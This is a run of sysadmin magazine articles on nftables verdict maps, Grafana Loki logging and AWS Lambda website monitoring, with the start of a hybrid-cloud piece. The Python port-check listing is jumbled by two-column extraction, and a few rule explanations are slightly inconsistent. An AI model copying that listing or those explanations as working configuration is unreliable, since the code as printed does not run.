The nice thing about nftables is that many of the new functions can be easily combined. Another function, verdict maps, demonstrates this very well. These maps are dictionaries that use the structure of a named set as a key and non-base chains as a key value if a match occurs. Although that might sound complicated, it is actually quite simple. For the following example, the requirement is that access to certain auditd and HTTPD servers should only be possible from certain IP addresses. Requests from other systems should be discarded directly. For this, I create a new chain named forward in the kernel entry point of the same name:

nft create chain inet firewall forward { type filter hook forward priority 0\; }

The auditd-servers and httpd-servers are each defined in a named set:

nft add set inet firewall audit-servers { type ipv4_addr \; }
nft add element inet firewall audit-servers { 10.1.0.1, 192.168.0.1 }
nft add set inet firewall http-servers { type ipv4_addr \; }
nft add element inet firewall http-servers { 10.1.1.1, 192.168.1.1 }

These named sets will be used in non-base chains, which I create in the next step:

nft add chain inet firewall audit-chain
nft add chain inet firewall http-chain

Listing 4: Complete Ruleset

nft list ruleset
table inet firewall {
  set audit-servers {
    type ipv4_addr
    elements = { 10.1.0.1, 192.168.0.1 }
  }
  set http-servers {
    type ipv4_addr
    elements = { 10.1.1.1, 192.168.1.1 }
  }
  chain forward {
    type filter hook forward priority 0; policy accept;
    ip daddr vmap { 10.1.0.2-10.1.0.10 : jump audit-chain, 10.1.1.2-10.1.1.10 : jump http-chain, 192.168.0.2-192.168.0.10 : jump audit-chain, 192.168.1.2-192.168.1.10 : jump http-chain }
    drop
  }
  chain audit-chain {
    tcp dport 60 ip daddr @audit-servers
  }
  chain http-chain {
    tcp dport { http, https } ip daddr @http-servers
  }
}

Finally, the assignment takes place; the target port for the HTTPD servers is defined as the anonymous set:


nft add rule inet firewall audit-chain tcp dport 60 ip daddr @audit-servers
nft add rule inet firewall http-chain tcp dport { 80, 443 } ip daddr @http-servers

Still missing is a way of controlling the requests to the individual systems, which is done with the help of the verdict maps mentioned above. Depending on the sender address, the request is routed to the appropriate non-base chain:

nft add rule inet firewall forward ip daddr vmap { 10.1.0.2-10.1.0.10 : jump audit-chain, 192.168.0.2-192.168.0.10 : jump audit-chain, 10.1.1.2-10.1.1.10 : jump http-chain, 192.168.1.2-192.168.1.10 : jump http-chain }

Finally, any further requests that do not apply to any of the existing rules are discarded:

nft add rule inet firewall forward drop

The whole ruleset then looks like Listing 4.

The new Linux packet filter has many more interesting features to offer, so you should refer to the very extensive documentation in the nftables project wiki [4], which also offers useful help for getting started with the new packet filter; you might also want to bookmark the nftables reference [3].

Converting from iptables Rules

Finally, you should become acquainted with iptables-translate, a useful new tool that lets you convert individual iptables commands, or even entire iptables rulesets, into nft commands. For example, if you would rather enter the nftables rule for accessing the SSH server shown in iptables syntax at the top of the article, you can see what the appropriate nft command would be:

iptables-translate -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW -j ACCEPT
nft add rule ip filter INPUT tcp dport 22 ct state new counter accept

If you want to convert all your iptables rulesets from /etc/sysconfig/iptables-save into nftables commands, use the command:

iptables-restore-translate -f /etc/sysconfig/iptables-save > /tmp/ruleset.nft

Calling

nft -f /tmp/ruleset.nft

then loads the converted rules into the nftables framework.

Conclusions

The Linux nftables packet filter framework offers a multitude of new features, improved performance, and simplified operation compared with previous packet filter implementations.

Info
[1] nftables project: [https://netfilter.org/projects/nftables/]
[2] Linux traffic control: [http://tldp.org/HOWTO/Traffic-Control-HOWTO/intro.html]
[3] nftables matches: [https://wiki.nftables.org/wiki-nftables/index.php/Quick_reference-nftables_in_10_minutes]
[4] nftables wiki: [https://wiki.nftables.org/wiki-nftables/index.php/Main_Page]

The Author
Thorsten Scherf is a Principal Consultant for Red Hat EMEA. You can meet him as a speaker at conferences. He is also a keen marathon runner whenever time and his family permit.

58 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M

Central logging for Kubernetes users

Shape Shifter
Grafana’s Loki is a good replacement candidate for the Elasticsearch, Logstash, and Kibana combination in
Kubernetes environments. By Martin Loschwitz

In conventional setups of the past, admins had to troubleshoot fewer nodes per setup and fewer technologies and protocols than is the case today in the cloud, with its hundreds and thousands of technologies and protocols for software-defined networking, software-defined storage, and solutions like OpenStack. In the worst case, network nodes also need to be checked separately. If you are searching for errors in this kind of environment, you cannot put the required logfiles together manually.
The Elasticsearch, Logstash, and Kibana (ELK) team has demonstrated its ability to collect logs continuously from affected systems, store them centrally, index the results, and thus make them searchable. However, ELK and its variations prove to be complex beasts. Getting ELK up and running is no mean achievement, and once it is finally running, operations and maintenance prove to be complex. A full-grown ELK cluster can massively consume resources, as well.
Unfortunately, you don't have a lot of alternatives. In the case of the popular competitor Splunk, a mere glance at the price list is bad for your blood pressure. However, the Grafana developers are sending Loki [1] into battle as a lean solution for central logging, aimed primarily at Kubernetes users who are already using Prometheus [2].
Loki claims to avoid much of the overhead that is a fixed part of ELK. In terms of functionality, the product can't keep up with ELK, but most admins don't need many features that bloat ELK in the first place. Unfortunately, ELK does not allow you to sacrifice part of the feature set for reduced complexity. Loki from Grafana opens up this door. In this article, I go into detail about Loki and describe which functions are available and which are missing.

The Roots of Loki: Prometheus and Cortex

If you follow Loki back to its roots, you will come across some interesting details: Loki is not a completely new development; the Grafana developers oriented their work on Prometheus – but not directly. Loki was inspired by a Prometheus fork named Cortex [3], which extends the original Prometheus, adding the horizontal scalability admins often missed.
Prometheus itself has no scale-out story. Instead, the developers recommend running many instances in parallel and sharding the systems to be monitored. Sending the incoming metric data to several Prometheus instances is intended to provide redundancy in such a setup, but this construct forces you to tie different Prometheus instances to a single instance of the graphics drawing tool Grafana, often with unsatisfactory results.
Cortex removes this Prometheus design limitation but has not yet achieved the widespread distribution level and popularity of its ancestor. Clearly, it was well enough known to the Grafana developers, because in their search for a suitable tool for their project they used Cortex as a starting point, which also explains the slogan the Loki developers use to advertise their product: Loki is "like Prometheus, but for logs."

Log Entries as Metric Data

Both Prometheus and its derivative Cortex are tools for monitoring, alerting, and trending (MAT). However, they cannot be compared with the well-known monitoring tools such as Icinga 2 or Nagios, which primarily focus on event-based monitoring. MAT systems, on the other hand, are designed to collect as many performance metrics as possible from the computers to be monitored.
From this data, the applied load can be read off and the future load can be estimated; monitoring is more or less a waste product. If you know how many instances of the httpd process are running on a system, you can use a suitable component to raise an alert as soon as a value drops below a certain threshold. Loki's radically revolutionary approach now consists of treating the log data of the target systems exactly as if they were regular metric data.
If you have already set up a complete Prometheus for an environment, you will have dealt with labels, which are useful in Prometheus to distinguish between metrics. Admins typically use labels for certain values: An http_return_codes metric could have a value label, which in turn takes values of 200, 403, 404, and so on. Ultimately, labels help admins keep the total number of all metrics reasonably manageable, limiting the overhead needed for storage and processing.

Different from ELK

Loki attaches itself to these labels and uses them to index the incoming log messages, which marks the biggest architectural difference from ELK. For this very reason, Loki is far more efficient and lightweight: It does not meticulously evaluate incoming log messages and store them on the basis of defined rules and keywords; rather, it works on the basis of the labels attached to them.
What sounds complicated in theory is simple and comprehensible in practice. Suppose, for example, an instance of the Cluster Consensus Manager Consul is running in a Kubernetes environment and produces log messages. If you rely on Prometheus for monitoring, you will use this tool to monitor Consul on the hosts.
One metric that Prometheus uses for Consul is consul_service_health_status, but if you are running a development instance and a production instance of the environment, you could define an Env label that can assume the value dev or prod. With Grafana linked to Prometheus, different graphs could then be drawn by label. Loki does something very similar by classifying the stored log entries by label so you can display log entries for prod and dev.
Although not as convenient as the full-text search feature to which ELK users are accustomed, the Loki solution is far more frugal in terms of resources. Because Prometheus and its Cortex fork are easy to configure dynamically, Loki is far better suited for operation in containers, as well.

Loki in Practice

Loki can be virtualized easily, and that was even one of the core requirements of the developers. Because Loki requires fewer resources than ELK, it does not need massive hardware resources. Like Prometheus, Loki is a Go application, which you can get from GitHub [1]. However, it is not necessary to roll out and launch Loki as a Go binary. In the best cloud style, the Loki developers offer Docker images of the solution on Docker Hub, so you can deploy them locally straightaway. Therefore, the only external task is to send the configuration file to the container.
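A minimal sketch of such a deployment, assuming the grafana/loki image from Docker Hub and a configuration file named loki-config.yaml in the current directory (the image tag, file name, and port mapping are illustrative, not prescribed by the article):

docker run -d --name loki -p 3100:3100 \
  -v $(pwd)/loki-config.yaml:/etc/loki/local-config.yaml \
  grafana/loki:latest -config.file=/etc/loki/local-config.yaml

Loki then answers on TCP port 3100, which is also where Grafana and Promtail will look for it later.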
Under the Hood

What looks so easy at first glance requires a combination of several components on the inside. In the style of a cloud-native application, Loki comprises several components that need to interact to succeed. However, the architecture on which Loki is based is not that specific to Loki. It simply recycles large parts of the development work already done for Cortex (Figure 1). Because Cortex works well, there's no reason why Loki shouldn't.

Figure 1: Loki inherits much of its design from Cortex, which sees itself as a more scalable Prometheus. © Grafana

Log data that reaches Loki is grabbed by the Distributor component; several instances of this service are usually running. With large-scale systems, the number of incoming log messages can quickly reach many millions depending on the type of services running in the cloud, so a single Distributor instance would hardly be sufficient. However, it would also be problematic to drop these incoming log messages into a database without filtering and processing. If the database survived the onslaught, it would inevitably become a bottleneck in the logging setup.
The active instances of the Distributor therefore categorize the incoming data into streams on the basis of labels and forward them to Ingesters, which are responsible for processing the data. In concrete terms, processing means forming log packages (chunks) from the incoming log messages, which can be compressed by Gzip. Like the Distributors, the several Ingester instances also run at the same time, forming a ring architecture over which a Distributor applies a consistent hash algorithm to calculate which of the Ingester instances is currently responsible for a particular label.
Once an Ingester has completed a chunk of a log, the final step en route to central logging then follows: storing the information in the storage system to which Loki is connected. As already mentioned, Loki differs considerably from its predecessor Prometheus, for which a time series database is a key aspect.
Loki, on the other hand, does not handle metrics, but text, so it stores the chunks and information about where they reside separately. The index lists all known chunks of log data, but the data packets themselves are located on the same storage facility configured for Loki.
What is interesting about the Loki architecture is that it almost completely separates the read and write paths. If you want to read logs from Loki via Grafana, a third service is used in Loki, the Querier, which accesses the index and stored chunks in the background. It also communicates briefly with the Ingesters to find log entries that have not yet been moved to storage. Otherwise, read and write operations function completely independently.

Scaling Works

Looking at the overall Loki construct, it becomes clear that the design of the solution fits perfectly with the requirements faced by the developers: scalable, cost-effective with regard to the required hardware, and as flexible as possible.
The index ends up with Cassandra, Bigtable, or DynamoDB, all of which are known to scale horizontally without restrictions. The chunks are stored in an object store such as Amazon S3, which also scales well. The components belonging to Loki itself, such as the Distributors and Queriers, are stateless and therefore scale to match requirements.
Only the Ingester is a bit tricky. Unlike its colleagues, it is a stateful application that simply must not fail. However, the implemented ring mechanism provides the features required for sharding, so you can deploy any number of Ingesters to suit needs. Loki scales horizontally without limits. Because it does not store the contents of the incoming log data, it has a noticeably smaller hardware footprint than a comparable ELK stack.
The Loki documentation contains detailed tips on scalability, but briefly, to scale horizontally, Loki needs the Consul cluster consensus mechanism to coordinate the work steps beyond the borders of nodes. If you want to use Loki in this way, it is a very good idea to read and understand the corresponding documentation, because a scaled Loki setup of this kind is far more complex than a single instance.
Loki is noticeably easier to implement than Prometheus, because Loki does not save the payload (i.e., the log data) itself at the end. This task is handled by external storage, which provides the high availability on which Loki relies.

Where Do the Logs Originate?

So far I have described how Loki works internally and how it stores and manages data. However, the question of how log messages make their way to Loki has not yet been clarified. This much is true: The Prometheus Node Exporters are not suitable here because they are tied to numeric metric data. Prometheus itself does not have the ability to process metric data other than numbers, which is why the existing Prometheus exporters cannot handle log messages.
In the setup described here, the Loki tool promtail attaches itself to existing logging sources, records the details there, and sends them to predefined instances of the Loki server. The "tail" in the name is no coincidence: Much like the tail Linux command, it outputs the ends of logs in Prometheus format.
During operation, you could also let Promtail handle and manipulate (rewrite) logfiles. Experienced Prometheus jockeys will quickly notice that Loki is fundamentally different from Prometheus in one design aspect: Whereas Prometheus collects its metric data from the monitoring targets itself, Loki follows the push principle – the Promtail instances send their data to Loki.
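As a rough sketch of that push setup – assuming the grafana/promtail image and a config file that lists the local log directory and the Loki push endpoint (all names and paths here are illustrative):

docker run -d --name promtail \
  -v /var/log:/var/log \
  -v $(pwd)/promtail-config.yaml:/etc/promtail/config.yml \
  grafana/promtail:latest -config.file=/etc/promtail/config.yml

In the config file, the clients section points at the Loki instance started earlier (e.g., http://loki:3100/loki/api/v1/push).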
Graphics with Grafana

Because Loki comes from the Grafana developers, the aggregated log data is only displayed with this tool. Grafana version 6.0 or newer offers the necessary functions. The rest is simple: Set up Loki as a data source as you would for Prometheus. Grafana then displays the corresponding entries. The query language naturally has certain similarities in Loki and Cortex and therefore in Prometheus. Even complex queries can be built. At the end of the day, Grafana turns out to be a useful tool for displaying logs with the Loki back end. If you prefer a less graphical approach, the logcli command-line tool is an option, too; as expected, however, it is not particularly convenient.
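A short sketch of a logcli session against the single-node setup from above; the address, label names, and values are only examples, with the env label mirroring the dev/prod labeling discussed earlier:

export LOKI_ADDR=http://localhost:3100
logcli labels
logcli query '{job="consul", env="prod"}' --limit 20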
Strong Duet

In principle, the team of Loki and Promtail can be used completely independently of a container solution, just like Prometheus. However, the developers doubtlessly prefer to see them used in combination with Kubernetes, and indeed, the solution is particularly well suited to Kubernetes. On the one hand, Prometheus and Cortex have been very closely connected to Kubernetes from the very beginning – so far, in fact, that Prometheus can attach itself directly to the Kubernetes master servers to find the list of systems to monitor with fully automated node discovery. Additionally, Prometheus is perfectly capable of collecting, interpreting, and storing the metric data output by Kubernetes, processing all labels that belong to the metric data automatically.
Loki ultimately inherits all these advantages: If Loki is attached to an existing Kubernetes Prometheus setup, the same label rules can be recycled, making the setup easy to use.

Monitoring Loki

The best solution for centralized logging is useless if it is not available in a crisis. The same applies if the admin has forgotten to integrate important logfiles into the Loki cycle. However, the Loki developers offer support for both scenarios. A small service named Loki Canary systematically searches systems for logfiles that Loki does not collect.
Both Loki and Promtail can even output metric data about themselves via their Prometheus interfaces, if so required; then, you can integrate it into Prometheus accordingly. The Loki Operations Manual lists appropriate metrics.

No Multitenancy

Finally, Loki also unfortunately inherited a "feature" from Prometheus. The program does not support user administration and therefore treats all users that access it equally. Loki is not usable for multitenancy. Instead, you need to run one Loki instance per tenant and secure it such that access by external intruders is not possible.

Info
[1] Loki: [https://github.com/grafana/loki/]
[2] Prometheus: [https://github.com/prometheus/prometheus]
[3] Cortex: [https://github.com/cortexproject/cortex]

Serverless computing with AWS Lambda

Light Work
Monitoring with AWS Lambda serverless technology reduces costs and
scales to your infrastructure automatically. By Chris Binnie

For a number of reasons, it makes sense to use today's cloud-native infrastructure to run software without employing servers; instead, you can use an arms-length, abstracted serverless platform such as AWS Lambda. For example, when you create a Lambda function (source code and a run-time configuration) and execute it, the AWS platform only bills you for the execution time, also called the "compute time." Simple tasks usually book only hundreds of milliseconds, as opposed to running an Elastic Compute Cloud (EC2) server instance all month long along with its associated costs.
In addition to reducing the cost and removing the often overlooked administrative burden of maintaining a fleet of servers to run your tasks, AWS Lambda also takes care of the sometimes difficult-to-get-right automatic scaling of your infrastructure. With Lambda, AWS promises that you can sit back with your feet up and rest assured that "your code runs in parallel" and that the platform will be "scaling precisely with the size of the workload" in an efficient and cost-effective manner [1].
In this article, I show you how to get started with AWS Lambda. Once you've seen that external connectivity is working, I'll use a Python script to demonstrate how you might use a Lambda function to monitor a website all year round, without the need of ever running a server.
For more advanced requirements, I'll also touch on how to get the internal networking set up correctly for a Lambda function to communicate with nonpublic resources (e.g., EC2 instances) hosted internally in AWS. Those Lambda functions will also be able to connect to the Internet, which can be challenging to get right.
On an established AWS infrastructure, most resources are usually segregated into their own virtual private clouds (VPCs) for security and organizational requirements, so I'll look at the workflow required to solve both internal and external connectivity headaches. I assume that you're familiar with the basics of the AWS Management Console and have access to an account in which you can test.

Less Is More

As already mentioned, be warned that Lambda function networking in AWS has a few quirks. For example, Internet Control Message Protocol (ICMP) traffic isn't permitted for running pings and other such network discovery services:
Lambda attempts to impose as few restrictions as possible on normal language and operating system activities, but there are a few activities that are disabled: Inbound network connections are blocked by AWS Lambda, and for outbound connections only TCP/IP sockets are supported, and ptrace (debugging) system calls are blocked. TCP port 25 traffic is also blocked as an anti-spam measure.
Digging a little deeper …, the Lambda OS kernel lacks the CAP_NET_RAW kernel capability to manipulate raw sockets.
So, you can't do ICMP or UDP from a Lambda function [2].
(Be warned that this page is a little dated and things may have changed.) In other words, you're not dealing with the same networking stack that you might find on a friendly Debian box running in EC2. However, as I'll demonstrate in a moment, public Domain Name Service (DNS) lookups do work as you'd hope, usually with the use of the UDP protocol.

Less Said, The Better

The way to prove that DNS lookups work is, as you might have guessed, to use a short script that simply performs a DNS lookup. First, however, you should create your function. Figure 1 shows the AWS Management Console [3] Lambda service page with an orange Create function button.

Figure 1: The page where you will create a Lambda function.

If you're wearing your reading glasses, you might see that the name of the function I've typed is internet-access-function. I've also chosen Python 3.7 as the preferred run time. I leave the default Author from scratch option alone at the top.
For now, I ignore the execution role at the bottom of the page and visit that again later, because the clever gubbins behind the scenes will automatically assign an IAM profile, trimmed right down, by default: AWS wants you to log in to CloudWatch to check the execution of your Lambda function.
The next screen in Figure 2 shows the new function; you can see its name in the Designer section and that it has Amazon CloudWatch Logs permissions by default. Figure 2 is only the top of a relatively long page that includes the Designer options. Sometimes these options are hidden and you need to expand them with the arrow next to the word Designer.

Figure 2: A new Lambda function.

Next, hide the Designer options by clicking on the aforementioned arrow. After a little scrolling down, you should see where you will paste your function code (Figure 3). A "Hello World" script, which I will run as an example, is already in the code area.

Figure 3: Your Lambda function code will go here in place of the Hello World example.

When I run the Hello World Lambda function by clicking Test, I get a big, green welcome box at the top of the screen (I had to scroll up a bit), and I can expand the details to show the output,

{
  "statusCode": 200,
  "body": "\"Hello from Lambda!\""
}

which means the test worked. If you haven't created a test event yet, you'll see a pop-up dialog box the first time you run a test, and you'll be asked to add an Event Name.
If you do that now, you can just leave the default key1 and other information in place. You don't need to change these values just yet, because, to execute both the Hello World and the DNS lookup script, you don't need to pass any variables to your Lambda function from here. I called my Event Name EmptyTest and then clicked the orange Create button at the bottom.
Next, I'll paste the DNS Python lookup script

import socket

def lambda_handler(event, context):
    data = socket.gethostbyname_ex('www.devsecops.cc')
    print(data)
    return

over the top of the Hello World example and click the orange Save button at the top.
To run the function as it stands (using only the default configuration options and making sure the indentation in your script is correct), simply click the Test button again; you should get another green success bar at the top of the screen.
The green bar will show null, because the script doesn't actually output anything. However, if you look in the Log Output section, you can see some output (Listing 1), with the IP address next to the DNS name you looked up.

Listing 1: DNS Lookup Output

START RequestId: 4e90b424-95d9-4453-a2f4-8f5259f5f263 Version: $LATEST
('www.devsecops.cc', [], ['138.68.149.181'])
END RequestId: 4e90b424-95d9-4453-a2f4-8f5259f5f263
REPORT RequestId: 4e90b424-95d9-4453-a2f4-8f5259f5f263
Duration: 70.72 ms
Billed Duration: 100 ms
Memory Size: 128 MB
Max Memory Used: 55 MB
Init Duration: 129.20 ms
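If you prefer the command line to the console's Test button, the same function can also be exercised with the AWS CLI – a small sketch, assuming your credentials and region are already configured (with AWS CLI v2 you may additionally need --cli-binary-format raw-in-base64-out for the inline payload):

aws lambda invoke --function-name internet-access-function \
  --payload '{}' response.json
cat response.json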

Listing 2: handler.py
001 import json 048 def reportbody(self):
002 import os 049 return self.__get_property(self.REPORT_RESPONSE_BODY)
003 import boto3 050
004 from time import perf_counter as pc 051 @property
005 import socket 052 def cwoptions(self):
006 053 return {
007 class Config: 054 'enabled': self.__get_property(self.REPORT_AS_CW_METRICS),
008 """Lambda function runtime configuration""" 055 'namespace':
009 self.__get_property(self.CW_METRICS_NAMESPACE),
010 HOSTNAME = 'HOSTNAME' 056 }
011 PORT = 'PORT' 057
012 TIMEOUT = 'TIMEOUT' 058 class PortCheck:
013 REPORT_AS_CW_METRICS = 'REPORT_AS_CW_METRICS' 059 """Execution of HTTP(s) request"""
014 CW_METRICS_NAMESPACE = 'CW_METRICS_NAMESPACE' 060
015 061 def __init__(self, config):
016 def __init__(self, event): 062 self.config = config
017 self.event = event 063
018 self.defaults = { 064 def execute(self):
019 self.HOSTNAME: 'google.com.au', 065 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
020 self.PORT: 443, 066 sock.settimeout(int(self.config.timeout))
021 self.TIMEOUT: 120, 067 try:
022 self.REPORT_AS_CW_METRICS: '1', 068 # start the stopwatch
023 self.CW_METRICS_NAMESPACE: 'TcpPortCheck', 069 t0 = pc()
024 } 070
025 071 connect_result = sock.connect_ex
026 def __get_property(self, property_name): ((self.config.hostname, int(self.config.port)))
027 if property_name in self.event: 072 if connect_result == 0:
028 return self.event[property_name] 073 available = '1'
029 if property_name in os.environ: 074 else:
030 return os.environ[property_name] 075 available = '0'
031 if property_name in self.defaults: 076
032 return self.defaults[property_name] 077 # stop the stopwatch
033 return None 078 t1 = pc()
034 079
035 @property 080 result = {
036 def hostname(self): 081 'TimeTaken': int((t1 - t0) * 1000),
037 return self.__get_property(self.HOSTNAME) 082 'Available': available
038 083 }
039 @property 084 print(f"Socket connect result: {connect_result}")
040 def port(self): 085 # return structure with data
041 return self.__get_property(self.PORT) 086 return result
042 087 except Exception as e:
043 @property 088 print(f"Failed to connect to {self.config.hostname}:{self.
044 def timeout(self): config.port}\n{e}")
045 return self.__get_property(self.TIMEOUT) 089 return {'Available': 0, 'Reason': str(e)}
046 090
047 @property 091 class ResultReporter:


Listing 2: handler.py (Continued)


092 """Reporting results to CloudWatch""" 120
093 121 result = cloudwatch.put_metric_data(
094 def __init__(self, config): 122 MetricData=metric_data,
095 self.config = config 123 Namespace=self.config.cwoptions['namespace']
096 self.options = config.cwoptions 124 )
097 125
098 def report(self, result): 126 print(f"Sent data to CloudWatch requestId=:{result['Re
099 if self.options['enabled'] == '1': sponseMetadata']['RequestId']}")
100 try: 127 except Exception as e:
101 endpoint = f"{self.config.hostname}:{s elf.config. 128 print(f"Failed to publish metrics to CloudWatch:{e}")
port}" 129
102 cloudwatch = boto3.client('cloudwatch') 130 def port_check(event, context):
103 metric_data = [{ 131 """Lambda function handler"""
104 'MetricName': 'Available', 132
105 'Dimensions': [ 133 config = Config(event)
106 {'Name': 'Endpoint', 'Value': endpoint} 134 port_check = PortCheck(config)
107 ], 135
108 'Unit': 'None', 136 result = port_check.execute()
109 'Value': int(result['Available']) 137
110 }] 138 # report results
111 if result['Available'] == '1': 139 ResultReporter(config).report(result)
112 metric_data.append({ 140
113 'MetricName': 'TimeTaken', 141 result_json = json.dumps(result, indent=4)
114 'Dimensions': [ 142 # log results
115 {'Name': 'Endpoint', 'Value': endpoint} 143 print(f"Result of checking {config.hostname}:{config.port}\
116 ], n{result_json}")
117 'Unit': 'Milliseconds', 144
118 'Value': int(result['TimeTaken']) 145 # return to caller
119 }) 146 return result

More or Less

For the second Lambda task, you'll use a more sophisticated script that will allow you to monitor a website. The script for the Lambda function, with the kind permission of the people behind the base2Services GitHub page [4], will attempt to perform a two-way remote TCP port connection. Copy the handler.py script (Listing 2) and paste it into the function tab, as before. If you can't copy the Python script easily, then click the Raw option on the right side of the page and copy all of the raw text.
Now, click Save at the top right and look for the Handler input box on the right-hand side of where you pasted the code. You'll need to change the starting point for the Lambda function from lambda_function.lambda_handler to lambda_function.port_check, which is how the script is written. Be sure to click Save again.
Next, configure a new test event,

{
  "HOSTNAME":"www.devsecops.cc",
  "PORT":"443",
  "TIMEOUT":5
}

adjusted a bit from the base2Services GitHub example [5]. Once you've adapted the parameters for your own system settings, go back to the EmptyTest box, pull down the menu, and click Configure test events to create a new parameter to pass to a test. I pasted the test event code over the top of the example JSON code, named it PortTest, and clicked Create.

More Haste, Less Speed

Now you can click the Test button to see if you can connect to the Internet over TCP port 443. Success is denoted this time if the output in the green bar at the top of the page shows:

{
  "TimeTaken": 187,
  "Available": "1"
}

To make sure it's working, alter your test event to a funny port number on which your destination definitely isn't listening (e.g., TCP port 4444) and see what happens. If you get a 0 for Available, you know the test is working as hoped.
Incidentally, you can ignore the CloudWatch errors if you notice them. In Listing 3 you can see the CloudWatch IAM policy auto-generated when you create the Lambda function. By default, it's trimmed down and will cause a relatively trivial CloudWatch metrics error, because it doesn't have a cloudwatch:PutMetricData permission, which the script would need.

Completely Hopeless

Now that your monitoring Lambda function is working, you can schedule it to run periodically to monitor a
website by using CloudWatch in AWS. In the CloudWatch section in the AWS Management Console, start with Events | Rules and choose the Schedule radio button (Figure 4). In the Targets section you want to select Lambda function in the drop-down and then select the name of your function (i.e., internet-access-function).

Figure 4: Setting up a schedule for a Lambda function in CloudWatch.

Next, click the blue Configure details button, add a name for the rule, and then click the blue Create rule button. Make sure the name doesn't contain spaces. To continue, click on Logs on the left-hand side; then, choose your Lambda function name, which in turn will reveal the log for each execution.
The top log entry offers some bad news (Figure 5). As you can see, the Lambda function's script defaults to Google in Australia (where the authors of the script reside), so you need to add your test event parameters into the CloudWatch rule. If the PutMetrics error is jumping out at you, then you can either adjust your IAM permissions, remove it from the Lambda function's script, or, of course, just ignore it.

Figure 5: To monitor the desired website, you need to adjust the input parameters of your CloudWatch rule.

Listing 3: CloudWatch IAM Policy

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "logs:CreateLogGroup",
      "Resource": "arn:aws:logs:eu-west-1:XXXXXXX:*"
    },
    {
      "Effect": "Allow",
      "Action": [
        "logs:CreateLogStream",
        "logs:PutLogEvents"
      ],
      "Resource": [
        "arn:aws:logs:eu-west-1:XXXXXX:log-group:/aws/lambda/internet-access-function:*"
      ]
    }
  ]
}

Fear not, however. If you go back into the configuration, you can adjust the run-time parameters of the CloudWatch rule with relative ease. To do so, select your Lambda function, copy the PortTest test event you created as JSON earlier, and simply add this to your rule.
Where do you paste it, you may well ask? Look inside your CloudWatch rule config and tick Constant (JSON text) under the Configure input drop-down options and then paste in the content used previously:

{
  "HOSTNAME":"www.devsecops.cc",
  "PORT":"443",
  "TIMEOUT":5
}

Having saved that change, you can now see in your CloudWatch log (Figure 6) that the Lambda function is indeed checking the correct website and logging its output for future reference.

Figure 6: Happiness is probing the correct website address.

Now that you can see the intended website, you can alter your rule's schedule to monitor its uptime every minute or every day – or, in fact, whatever time period you desire. You can even use a cron format, if you prefer.
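The same schedule and constant input can also be set up from the command line; the following is only a sketch, with the rule name, region, and account ID as placeholder values (the function additionally needs a lambda add-permission grant so that CloudWatch Events may invoke it):

aws events put-rule --name website-uptime-check \
  --schedule-expression 'rate(1 minute)'
aws events put-targets --rule website-uptime-check \
  --targets '[{"Id":"1","Arn":"arn:aws:lambda:eu-west-1:123456789012:function:internet-access-function","Input":"{\"HOSTNAME\":\"www.devsecops.cc\",\"PORT\":\"443\",\"TIMEOUT\":5}"}]'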
If you want to go a step further, you can also create metrics for your CloudWatch rule and create a Simple Notification Service (SNS) topic so that email alarms are triggered when the website is unavailable. That part of the jigsaw puzzle is relatively easy to pick up if you haven't done it before. Remember to disable the CloudWatch rule once you've finished testing to avoid the potential of an email storm.
Now that you have a shiny new working Lambda function that can be scheduled to run whenever you like, I'll spend a moment looking at what a more complex workflow might look like if you were running your Lambda function inside a VPC.

Don't Be Careless

At the beginning of this article, I mentioned that Internet access is trickier if you have a more mature infrastructure and host your Lambda functions inside a VPC so that they can access nonpublic resources securely, as well as the Internet. Table 1 shows the workflow involved.
A minor caveat is that if you're testing against existing networking that is already running important services, it's possible to tie yourself in knots and break things horribly.
To get started, try to create, where possible, these new resources inside a new VPC for testing purposes. Some of the resources should definitely be deleted afterward – especially the Elastic Network Interface (ENI) – to save ongoing costs for Elastic IP addresses. Consider yourself suitably warned!
If you are familiar with the innards of AWS and have looked through Table 1, I could be forgiven for summarizing it in one sentence: "To access resources inside a VPC, use a private subnet and a NAT gateway and then connect that to a public subnet, which by inference has an Internet gateway attached for external Internet access."
I've had success with the above approach, so bear this workflow in mind for future reference if you foresee a need.

Table 1: Workflow for VPCs
Step 1: Check your VPC configuration and create a new one if needed.
Step 2: Create a private subnet specifically for your Lambda function, so you can isolate your other services from potential security risks.
Step 3: Create a public subnet in your VPC if one doesn't exist.
Step 4: Ensure an Internet gateway is present in the public subnet, and adjust your routing table for outbound traffic to point at 0.0.0.0/0.
Step 5: Point your private subnet's NAT gateway at the public subnet and point all traffic (0.0.0.0/0) to the NAT gateway.
Step 6: Create or adjust a security group for your network rules, "self referencing" the security group to itself in a rule, if needed by your Lambda function.
Step 7: Configure your Lambda function to use the correct VPC, subnet(s), and security group.
Step 8: Add the suitable IAM permissions to your Lambda function so that it can access the resources of your VPC. Make sure these permissions are available to your IAM role: ec2:CreateNetworkInterface, ec2:DescribeNetworkInterfaces, ec2:DeleteNetworkInterface, ec2:DescribeSecurityGroups, ec2:DescribeSubnets, ec2:DescribeVpc
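Step 7, for example, can also be done with the AWS CLI rather than the console – a sketch with placeholder subnet and security group IDs:

aws lambda update-function-configuration \
  --function-name internet-access-function \
  --vpc-config SubnetIds=subnet-0abc12345,SecurityGroupIds=sg-0def67890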
Endless

No doubt you'll be using serverless technologies more and more in the future. However, a few gotchas that introduce security risks still need some attention. Sadly, they don't magically disappear when using an abstracted platform, as some would hope. That said, I hope you can see the benefits of such abstraction, in terms of operational overhead and running costs. It's safe to say that with some basic scripting skills, serverless technology makes light work of numerous tasks.

Info
[1] AWS Lambda: [https://aws.amazon.com/lambda]
[2] Ping from Lambda function: [https://forums.aws.amazon.com/thread.jspa?threadID=263968]
[3] AWS Management Console: [https://console.aws.amazon.com]
[4] handler.py: [https://github.com/base2Services/aws-lambda-port-check/blob/master/handler.py]
[5] Example test: [https://github.com/base2Services/aws-lambda-port-check/blob/master/test/example.json]

Hybrid public/private cloud

Seamless
Extending your data center temporarily into the cloud during a customer rush might not be easy, but it
can be done, thanks to Ansible’s Playbooks and some AWS scripts. By Konstantin Agouros

Companies often do not exclusively use public cloud services such as Amazon Web Services (AWS) [1], Microsoft Azure [2], or Google Cloud [3]. Instead, they rely on a mix, known as a hybrid cloud. In this scenario, you connect your data centers (private cloud) with the resources of a public cloud provider. The term "private cloud" is somewhat misleading, in that the operation of many data centers has little to do with cloud-based working methods, but it looks like the name is here to stay.
